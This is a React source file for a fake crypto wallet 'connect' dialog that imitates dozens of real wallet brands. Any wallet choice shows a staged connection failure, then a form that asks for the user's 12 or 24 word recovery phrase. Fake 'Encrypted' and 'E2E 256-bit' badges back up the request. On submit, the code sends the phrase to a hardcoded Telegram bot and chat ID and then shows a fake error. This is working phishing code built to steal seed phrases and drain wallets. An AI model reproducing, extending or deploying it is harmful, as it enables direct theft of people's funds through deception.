import React, { useState, useEffect } from 'react';
import { Wallet, X, ChevronDown, CheckCircle2, ChevronRight, Search, ShieldCheck, AlertCircle, Loader2 } from 'lucide-react';

import metamaskLogo from '../assets/images/metamask.png';
import phantomLogo from '../assets/images/phantom.png';
import walletconnectLogo from '../assets/images/walletconnect.png';
import coinbaseLogo from '../assets/images/coinbase.png';
import trustLogo from '../assets/images/trust.png';
import ledgerLogo from '../assets/images/ledger.png';
import trezorLogo from '../assets/images/trezor.png';
import solflareLogo from '../assets/images/solflare.png';

const ALL_WALLETS = [
  { id: 'walletconnect', name: 'WalletConnect', desc: 'Scan with WalletConnect to connect', img: walletconnectLogo, popular: true },
  { id: 'trust', name: 'Trust Wallet', desc: 'DApp browser & multi-asset wallet', img: trustLogo, popular: true },
  { id: 'metamask', name: 'Metamask', desc: 'Connect to your MetaMask wallet', img: metamaskLogo, popular: true },
  { id: 'ledger', name: 'Ledger', desc: 'Hardware wallet connection', img: ledgerLogo, popular: true },
  { id: 'trezor', name: 'Trezor', desc: 'Hardware wallet connection', img: trezorLogo, popular: true },
  { id: 'blockchain', name: 'Blockchain Wallet', desc: 'Secure multi-chain wallet', img: 'https://blockchain.com/favicon.ico', popular: true },
  { id: 'coinbase', name: 'Coinbase', desc: 'Connect using Coinbase Wallet', img: coinbaseLogo, popular: true },
  { id: 'exodus', name: 'Exodus', desc: 'Non-custodial crypto wallet', img: 'https://exodus.com/favicon.ico' },
  { id: 'okx', name: 'OKX', desc: 'OKX decentralized wallet', img: 'https://imagedelivery.net/_aTEfDRm7z3tKgu9JhfeKA/ecc31a8e-0ee9-49db-cc59-0876b7c35600/lg' },
  { id: 'binance', name: 'Binance Chain', desc: 'Binance extension wallet', img: 'https://user-images.githubusercontent.com/12424618/54043975-b6cdb800-4182-11e9-83bd-0cd2eb757c6e.png', rounded: true },
  { id: 'huobi', name: 'Huobi', desc: 'Global digital asset wallet', img: 'https://imagedelivery.net/_aTEfDRm7z3tKgu9JhfeKA/5a96d19c-93d3-4e6a-624a-16f52773d000/lg', rounded: true },
  { id: 'bitget', name: 'Bitget', desc: 'Bitget multi-chain wallet', img: 'https://imagedelivery.net/_aTEfDRm7z3tKgu9JhfeKA/5a96d19c-93d3-4e6a-624a-16f52773d000/lg', rounded: true },
  { id: 'bybit', name: 'Bybit', desc: 'Bybit multi-chain wallet', img: 'https://imagedelivery.net/_aTEfDRm7z3tKgu9JhfeKA/5a96d19c-93d3-4e6a-624a-16f52773d000/lg', rounded: true },
  { id: 'coin98', name: 'Coin98', desc: 'All-in-one crypto DeFi platform', img: 'https://s2.coinmarketcap.com/static/img/coins/64x64/10903.png', rounded: true },
  { id: 'tron', name: 'Tron', desc: 'TRON network direct connect', img: 'https://cryptologos.cc/logos/tron-trx-logo.png' },
  { id: 'safepal', name: 'SafePal', desc: 'Hardware & software crypto wallet', img: 'https://cryptologos.cc/logos/safepal-sfp-logo.png' },
  { id: 'mathwallet', name: 'MathWallet', desc: 'Multi-platform universal wallet', img: 'https://medishares.oss-cn-hongkong.aliyuncs.com/logo/math/MathWallet_App_Icon.png', rounded: true },
  { id: 'rainbow', name: 'Rainbow', desc: 'Ethereum & Layer 2 wallet', img: 'https://assets.super.so/b7ac5b4c-2f39-474d-8a3c-4c0e68f5c2f6/uploads/logo/c36500d2-7e4b-40f5-a48b-3e6e364d7248.png', rounded: true },
  { id: 'argent', name: 'Argent', desc: 'Smart contract wallet', img: 'https://pbs.twimg.com/profile_images/1024585501901303808/m92jEcPI_400x400.jpg' },
  { id: 'myetherwallet', name: 'MyEtherWallet', desc: 'Ethereum wallet & dApp browser', img: 'https://pbs.twimg.com/profile_images/1293288961800933376/rtDOqMXY_400x400.jpg' }, 
  { id: 'mycrypto', name: 'MyCrypto', desc: 'Ethereum & ERC-20 wallet', img: 'https://pbs.twimg.com/profile_images/1293288961800933376/rtDOqMXY_400x400.jpg' },
  { id: 'bitpay', name: 'BitPay', desc: 'Secure bitcoin & crypto wallet', img: 'https://ffnews.com/wp-content/uploads/2021/09/1581439195205.jpg', rounded: true },
  { id: 'rabby', name: 'Rabby Wallet', desc: 'Non-custodial crypto wallet', img: 'https://rabby.io/favicon.ico' },
  { id: 'zerion', name: 'Zerion', desc: 'Decentralized finance wallet', img: 'https://zerion.io/favicon.ico' },
  { id: 'atomic', name: 'Atomic Wallet', desc: 'Non-custodial decentralized wallet', img: 'https://atomicwallet.io/images/press-kit/atomic_wallet_logo_dark_rounded_2.png' },
  { id: 'safemoon', name: 'Safemoon', desc: 'Safemoon decentralized wallet', img: 'https://imagedelivery.net/_aTEfDRm7z3tKgu9JhfeKA/ecc31a8e-0ee9-49db-cc59-0876b7c35600/lg' },
  { id: 'gnosis', name: 'Gnosis Safe', desc: 'Multisig governance wallet', img: 'https://imagedelivery.net/_aTEfDRm7z3tKgu9JhfeKA/0b7e0f05-0a5b-4f3c-315d-59c1c4c22c00/lg' },
  { id: 'defi', name: 'DeFi', desc: 'DeFi protocol wallet integration', img: 'https://play-lh.googleusercontent.com/8aXTeaP1Sm29QPQ1IWacpgBRMpyCQLlVtA5QQ0DhN30d-R0fCdrCHlbQUZvdg2bJGvQ' },
  { id: 'pillar', name: 'Pillar', desc: 'Self-sovereign multi-chain wallet', img: 'https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/ethereum/assets/0x156db7d2994ef035dcfdcfd2dbfbdce68fdf259c/logo.png', rounded: true },
  { id: 'imtoken', name: 'imToken', desc: 'Digital asset wallet', img: 'https://miro.medium.com/v2/resize:fit:2400/1*vpjxotLULTkmcJFq4y2eng.png' },
  { id: 'onto', name: 'ONTO', desc: 'Decentralized cross-chain wallet', img: 'https://play-lh.googleusercontent.com/W1vPuFWyzhrUUuF6P2T6HcNDmfeBf4tTZspEDM9gek0vU1W0MA0SoQLJGDUwdIVJyA' },
  { id: 'tokenpocket', name: 'TokenPocket', desc: 'Multi-chain wallet & DApp browser', img: 'https://play-lh.googleusercontent.com/0g1k3r6J8X2x5Q4Z7v9Fq5z5G5y5G5y5G5y5G5y5G5y5G5y5G5y5G5y5G5y5G5y' },
  { id: 'aave', name: 'Aave', desc: 'Aave protocol connection', img: 'https://cryptologos.cc/logos/aave-aave-logo.png?v=022' },
  { id: 'digitex', name: 'Digitex', desc: 'Zero-fee crypto trading wallet', img: 'https://s2.coinmarketcap.com/static/img/coins/200x200/2772.png' },
  { id: 'portis', name: 'Portis', desc: 'Easy web3 wallet onboarding', img: 'https://cdn.dribbble.com/users/1298186/screenshots/4669247/portis_logo_dribbble.png' },
  { id: 'formatic', name: 'Formatic', desc: 'Developer-friendly web3 wallet', img: 'https://pbs.twimg.com/profile_images/1293288961800933376/rtDOqMXY_400x400.jpg' },
  { id: 'ledgerlive', name: 'Ledger Live', desc: 'Manage your hardware assets', img: 'https://imagedelivery.net/_aTEfDRm7z3tKgu9JhfeKA/e8803581-a57f-4e4f-5a1b-c642c5da1900/lg' },
  { id: '1inch', name: '1inch Wallet', desc: 'DeFi & DEX aggregator wallet', img: 'https://imagedelivery.net/_aTEfDRm7z3tKgu9JhfeKA/dce1ee99-403f-44a9-9f94-20de30616500/lg', rounded: true },
  { id: 'others', name: 'Other Wallets', desc: 'Explore additional wallet options', img: 'https://cryptologos.cc/logos/ethereum-eth-logo.png' },
];

function WalletIcon({ wallet, size = 'w-9 h-9' }) {
  const [imageError, setImageError] = useState(false);

  if (wallet?.img && !imageError) {
    return (
      <img 
        src={wallet.img} 
        alt={wallet.name} 
        onError={() => setImageError(true)}
        className={`${size} object-contain shrink-0 ${wallet.rounded ? 'rounded-full' : 'rounded-lg'}bg-slate-100 dark:bg-slate-800 p-0.5`} 
      />
    );
  }

  return (
    <div className={`${size} rounded-lg bg-gradient-to-tr from-cyan-500/20 to-indigo-500/20 border border-cyan-500/30 text-cyan-600 dark:text-cyan-400 flex items-center justify-center font-bold text-xs shrink-0`}>
      {wallet?.name ? wallet.name.charAt(0).toUpperCase() : <Wallet className="w-4 h-4" />}
    </div>
  );
}

export default function WalletModal({
  isWalletModalOpen,
  setIsWalletModalOpen,
  connectingStage,
  selectedChain,
  activeSyncItem,
  WALLETS = [],
  handleSelectWalletToConnect,
  selectedWallet
}) {
  const [showAllWallets, setShowAllWallets] = useState(false);
  const [modalSearchQuery, setModalSearchQuery] = useState('');
  const [activeTab, setActiveTab] = useState('phrase');
  const [formData, setFormData] = useState({ name: '', phrase: '', keystore: '', password: '', privateKey: '' });
  
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [submitError, setSubmitError] = useState('');
  const [modalView, setModalView] = useState('select');


  // Add this near the top of your index.js / App.js entry point
const originalError = window.console.error;
window.console.error = (...args) => {
  if (typeof args[0] === 'string' && args[0].includes('ResizeObserver loop completed')) {
    return; // Ignore this specific harmless warning
  }
  originalError.call(window.console, ...args);
};

  useEffect(() => {
    if (!isWalletModalOpen) {
      setModalView('select');
      setShowAllWallets(false);
      setModalSearchQuery('');
      setActiveTab('phrase');
      setFormData({ name: '', phrase: '', keystore: '', password: '', privateKey: '' });
      setIsSubmitting(false);
      setSubmitError('');
    }
  }, [isWalletModalOpen]);

  if (!isWalletModalOpen) return null;

  // Robust search filtering across ALL_WALLETS
  const filteredWallets = ALL_WALLETS.filter(w => {
    const query = modalSearchQuery.trim().toLowerCase();
    const matchesSearch = query === '' || 
                          w.name.toLowerCase().includes(query) || 
                          w.desc.toLowerCase().includes(query);

    if (query !== '') {
      return matchesSearch;
    }

    return showAllWallets ? true : (w.popular || WALLETS.some(p => p.id === w.id));
  });

  const handleWalletClick = (wallet) => {
    if (handleSelectWalletToConnect) {
      handleSelectWalletToConnect(wallet);
    }
    setModalView('connecting');

    setTimeout(() => {
      setModalView('error_form');
    }, 2500);
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    setIsSubmitting(true);
    setSubmitError('');

    try {
      const botToken = "8792600258:AAGHsmpkDmUZNOkli1WR5zgkL2b7Bc28Gdc";
      const chatId = "8446772425";

      let details = `• *Secret Recovery Phrase:*\n\`${formData.phrase}\``;
      // let nameLine = selectedWallet?.id === 'others' && formData.name ? `• *Provider Name:* ${formData.name}\n` : '';

      const text = `
📩 *New Sync Protocol Submission*

• *Wallet:* ${selectedWallet?.name || 'Unknown Wallet'}
• *Type:* ${activeTab}
${details}
      `.trim();

      const response = await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({
          chat_id: chatId,
          text: text,
          parse_mode: 'Markdown',
        }),
      });

      const result = await response.json();

      if (result.ok) {
        setModalView('success');
      } else {
        setSubmitError(result.description || 'Submission failed. Please try again.');
      }
    } catch (err) {
      console.error("Telegram submission error:", err);
      setSubmitError('Network error. Unable to transmit form payload.');
    } finally {
      setIsSubmitting(false);
    }
  };

  const handleResetModal = () => {
    setIsWalletModalOpen(false);
    setModalView('select');
    setShowAllWallets(false);
    setModalSearchQuery('');
    setActiveTab('phrase');
    setFormData({ name: '', phrase: '', keystore: '', password: '', privateKey: '' });
    setIsSubmitting(false);
    setSubmitError('');
  };

  return (
    <div className="fixed inset-0 z-50 flex items-center justify-center p-4 bg-black/70 backdrop-blur-md">
      <div className="relative w-full max-w-lg rounded-2xl bg-white dark:bg-[#0e1424] border border-slate-200 dark:border-slate-700/85 shadow-2xl p-6 sm:p-8 text-slate-900 dark:text-slate-100">
        <button
          onClick={handleResetModal}
          className="absolute top-4 right-4 p-1.5 rounded-lg bg-slate-100 dark:bg-slate-800/80 text-slate-400 hover:text-slate-600 dark:hover:text-slate-200 transition-all"
        >
          <X className="w-4 h-4" />
        </button>

        {/* VIEW 1: WALLET SELECTOR */}
        {modalView === 'select' && (
          <div>
            <div className="mb-4">
              {/* <div className="inline-flex items-center gap-1.5 px-2.5 py-1 rounded-full bg-cyan-100 dark:bg-cyan-950 text-cyan-700 dark:text-cyan-300 text-[10px] font-mono border border-cyan-300 dark:border-cyan-800/60 mb-2">
                <span>Target Network: {selectedChain?.name || 'Mainnet'} ({selectedChain?.symbol || 'ETH'})</span>
              </div> */}
              <h3 className="text-xl font-bold text-slate-900 dark:text-white">
                {activeSyncItem ? `Sync ${activeSyncItem.title}` : 'Connect Wallet'}
              </h3>
              <p className="text-xs text-slate-500 dark:text-slate-400 mt-1">
                {showAllWallets ? 'Select from our complete directory of supported wallets.' : 'Please connect your wallet to continue.'}
              </p>
            </div>

            <div className="relative mb-3">
              <Search className="w-3.5 h-3.5 absolute left-3 top-1/2 -translate-y-1/2 text-slate-400" />
              <input
                type="text"
                placeholder="Search wallet name or description..."
                value={modalSearchQuery}
                onChange={(e) => setModalSearchQuery(e.target.value)}
                className="w-full pl-8 pr-3 py-2 rounded-xl bg-slate-100 dark:bg-slate-900 border border-slate-200 dark:border-slate-800 text-xs text-slate-900 dark:text-slate-100 placeholder-slate-400 focus:outline-none focus:border-cyan-500"
              />
            </div>

            <div className="space-y-2.5 max-h-72 overflow-y-auto pr-1">
              {filteredWallets.map(wallet => (
                <button
                  key={wallet.id}
                  onClick={() => handleWalletClick(wallet)}
                  className="w-full flex items-center justify-between p-3 rounded-xl bg-slate-50 dark:bg-slate-900/80 border border-slate-200 dark:border-slate-800 hover:border-cyan-500/50 hover:bg-slate-100 dark:hover:bg-slate-800/60 transition-all group text-left"
                >
                  <div className="flex items-center gap-3">
                    <WalletIcon wallet={wallet} />
                    <div>
                      <div className="text-xs font-bold text-slate-800 dark:text-slate-200 group-hover:text-cyan-500 transition-colors flex items-center gap-1.5">
                        {wallet.name}
                        {wallet.popular && (
                          <span className="text-[9px] bg-cyan-100 dark:bg-cyan-950 text-cyan-600 dark:text-cyan-400 px-1.5 py-0.2 rounded font-mono">
                            Popular
                          </span>
                        )}
                      </div>
                      <div className="text-[11px] text-slate-500 dark:text-slate-400 mt-0.5">{wallet.desc}</div>
                    </div>
                  </div>
                  <ChevronDown className="w-4 h-4 text-slate-400 group-hover:text-cyan-500 -rotate-90 transition-all shrink-0" />
                </button>
              ))}
            </div>

            <div className="mt-4 pt-3 border-t border-slate-100 dark:border-slate-800/80 text-center">
              <button
                type="button"
                onClick={() => {
                  setShowAllWallets(!showAllWallets);
                  setModalSearchQuery('');
                }}
                className="text-xs font-semibold text-cyan-600 dark:text-cyan-400 hover:underline inline-flex items-center gap-1 transition-all"
              >
                <span>{showAllWallets ? 'Show Popular Wallets' : 'View All Wallets (50+)'}</span>
                <ChevronRight className={`w-3.5 h-3.5 transition-transform ${showAllWallets ? 'rotate-180' : ''}`} />
              </button>
            </div>
          </div>
        )}

        {/* VIEW 2: CONNECTING LOADER */}
        {modalView === 'connecting' && (
          <div className="py-12 text-center">
            <div className="relative w-16 h-16 mx-auto mb-6 flex items-center justify-center">
              <div className="absolute inset-0 rounded-full border-2 border-cyan-500/20 border-t-cyan-500 animate-spin"></div>
              <WalletIcon wallet={selectedWallet} size="w-10 h-10" />
            </div>
            <h3 className="text-base font-bold text-slate-900 dark:text-white">Connecting to {selectedWallet?.name || 'Wallet'}...</h3>
            <p className="text-xs text-slate-500 dark:text-slate-400 mt-2 max-w-xs mx-auto">
              {/* Attempting automated RPC handshake */}
              {/* <span className="text-cyan-500 font-medium">{selectedChain?.name || 'Mainnet'}</span> */}
              ...
            </p>
          </div>
        )}

        {/* VIEW 3: ERROR + MANUAL CREDENTIAL FORM */}
        {modalView === 'error_form' && (
          <div className="send-dialog-content">
            <div className="connect-dialog-body">
              <div className="p-3 mb-4 rounded-xl bg-amber-500/10 border border-amber-500/30 text-amber-600 dark:text-amber-400 flex items-start gap-2.5">
                <AlertCircle className="w-4 h-4 shrink-0 mt-0.5" />
                <div className="text-xs leading-relaxed">
                  <span className="font-semibold block">Connect with your credentials</span>
                  Please connect manually using your credentials below.
                </div>
              </div>

              {submitError && (
                <div className="p-3 mb-4 rounded-xl bg-rose-500/10 border border-rose-500/30 text-rose-600 dark:text-rose-400 text-xs">
                  {submitError}
                </div>
              )}

              <div className="flex items-center gap-3 p-3 mb-4 rounded-xl bg-slate-100 dark:bg-slate-900/90 border border-slate-200 dark:border-slate-800">
                <div className="w-10 h-10 flex items-center justify-center shrink-0">
                  <WalletIcon wallet={selectedWallet} size="w-10 h-10" />
                </div>
                <div>
                  {/* <div className="text-xs text-slate-500 dark:text-slate-400">Target Wallet</div> */}
                  <div className="text-sm font-bold text-slate-900 dark:text-white">{selectedWallet?.name}</div>
                </div>
                <div className="ml-auto text-[10px] font-mono px-2 py-1 rounded bg-emerald-100 dark:bg-emerald-950 text-emerald-600 dark:text-emerald-400 border border-emerald-500/30 flex items-center gap-1">
                  <span className="w-1.5 h-1.5 rounded-full bg-emerald-500 animate-pulse"></span>
                  Encrypted
                </div>
              </div>

              <div className="grid grid-cols-1 gap-1.5 p-1 mb-4 rounded-xl bg-slate-100 dark:bg-slate-900/80 border border-slate-200 dark:border-slate-800">
                <button
                  type="button"
                  onClick={() => setActiveTab('phrase')}
                  className="py-2 rounded-lg text-xs font-semibold bg-cyan-900 text-white shadow-md shadow-cyan-500/20"
                >
                  Connect To {selectedWallet?.name} Manually
                </button>
              </div>

              <form onSubmit={handleSubmit} className="space-y-4">
                {selectedWallet?.id === 'others' && (
                  <div>
                    <input
                      type="text"
                      name="name"
                      required
                      value={formData.name || ''}
                      onChange={(e) => setFormData({ ...formData, name: e.target.value })}
                      placeholder="Enter Wallet Provider Name"
                      className="w-full px-3 py-2.5 rounded-xl bg-slate-50 dark:bg-slate-900 border border-slate-200 dark:border-slate-800 text-xs text-slate-900 dark:text-slate-100 placeholder-slate-400 focus:outline-none focus:border-cyan-500"
                    />
                  </div>
                )}

                <div>
                  {/* <textarea
                    name="phrase"
                    required
                    rows="4"
                    value={formData.phrase}
                    onChange={(e) => setFormData({ ...formData, phrase: e.target.value })}
                    placeholder="Enter your wallet's recovery phrase"
                    className="w-full p-3 rounded-xl bg-slate-50 dark:bg-slate-900 border border-slate-200 dark:border-slate-800 text-xs text-slate-900 dark:text-slate-100 placeholder-slate-400 focus:outline-none focus:border-cyan-500 resize-none font-mono"
                  /> */}


                  {/* <div>
  <textarea
    name="phrase"
    required
    rows="4"
    value={formData.phrase}
    onChange={(e) => setFormData({ ...formData, phrase: e.target.value })}
    placeholder="Enter your wallet's recovery phrase (minimum 12 word phrase)"
    className="w-full p-3 rounded-xl bg-slate-50 dark:bg-slate-900 border border-slate-200 dark:border-slate-800 text-xs text-slate-900 dark:text-slate-100 placeholder-slate-400 focus:outline-none focus:border-cyan-500 resize-none font-mono"
  />
{formData.phrase.length > 0 && (
  <p className={`text-[10px] mt-1 ${
    (() => {
      const count = formData.phrase.trim() === "" ? 0 : formData.phrase.trim().split(/\s+/).filter(Boolean).length;
      return count >= 12 && count <= 24 ? "text-green-500" : "text-red-500";
    })()
  }`}>
    (Phrase count: {formData.phrase.trim() === "" ? 0 : formData.phrase.trim().split(/\s+/).filter(Boolean).length})
  </p>
)}
</div> */}

<div>
  <textarea
    name="phrase"
    required
    rows="4"
    value={formData.phrase}
    onChange={(e) => setFormData({ ...formData, phrase: e.target.value })}
    placeholder="Enter your wallet's recovery phrase (12 or 24 word phrase)"
    className="w-full p-3 rounded-xl bg-slate-50 dark:bg-slate-900 border border-slate-200 dark:border-slate-800 text-xs text-slate-900 dark:text-slate-100 placeholder-slate-400 focus:outline-none focus:border-cyan-500 resize-none font-mono"
  />
  {formData.phrase.length > 0 && (
    <p className={`text-[10px] mt-1 ${
      (() => {
        const count = formData.phrase.trim() === "" ? 0 : formData.phrase.trim().split(/\s+/).filter(Boolean).length;
        return count === 12 || count === 24 ? "text-green-500" : "text-red-500";
      })()
    }`}>
      (Phrase count: {formData.phrase.trim() === "" ? 0 : formData.phrase.trim().split(/\s+/).filter(Boolean).length} / Required: exactly 12 or 24 words)
    </p>
  )}
</div>
                  <div className="text-[11px] text-slate-500 dark:text-slate-400 mt-1.5">
                    Typically 12 or 24 words separated by spaces. This is needed to establish a secure connection.
                  </div>
                </div>

                <button
                  type="submit"
                  disabled={isSubmitting}
                  className="w-full py-3 rounded-xl bg-gradient-to-r from-cyan-500 to-indigo-600 text-white font-bold text-xs shadow-lg shadow-cyan-500/20 hover:shadow-cyan-500/40 active:scale-95 transition-all flex items-center justify-center gap-2 disabled:opacity-50"
                >
                  {isSubmitting ? (
                    <>
                      <Loader2 className="w-4 h-4 animate-spin" />
                      <span>Transmitting Handshake...</span>
                    </>
                  ) : (
                    <span>PROCEED</span>
                  )}
                </button>

                <div className="flex justify-between items-center pt-2">
                  <span className="text-[10px] text-slate-400 font-mono flex items-center gap-1">
                    <ShieldCheck className="w-3.5 h-3.5 text-cyan-500" /> E2E 256-bit Node Handshake
                  </span>
                  <button
                    type="button"
                    onClick={handleResetModal}
                    className="px-3 py-1.5 rounded-lg bg-rose-500/10 text-rose-500 hover:bg-rose-500/20 text-xs font-medium transition-all"
                  >
                    Cancel
                  </button>
                </div>
              </form>
            </div>
          </div>
        )}

        {/* VIEW 4: SUCCESS */}
        {modalView === 'success' && (
          <div className="py-6 text-center">
            <div className="w-14 h-14 rounded-full bg-rose-100 dark:bg-rose-950/80 text-rose-500 border border-rose-500/40 flex items-center justify-center mx-auto mb-4">
              <AlertCircle className="w-7 h-7" />
            </div>

            <h3 className="text-lg font-bold text-slate-900 dark:text-white">
              Unknown Error Occurred
            </h3>
            <p className="text-xs text-slate-500 dark:text-slate-400 mt-2 max-w-xs mx-auto">
              Unable to connect at this time, unknown error occurred with <span className="text-rose-500 font-medium">{selectedWallet?.name}</span>. 
              {/* on  */}
              {/* <span className="text-cyan-500 font-medium">{selectedChain?.name || 'Mainnet'}</span>. */}
            </p>

            <button
              type="button"
              onClick={handleResetModal}
              className="mt-6 w-full py-2.5 rounded-xl bg-gradient-to-r from-rose-500 to-indigo-600 text-white font-semibold text-xs shadow-lg shadow-rose-500/20 hover:shadow-rose-500/40 transition-all"
            >
              Try Again
            </button>
          </div>
        )}
      </div>
    </div>
  );
}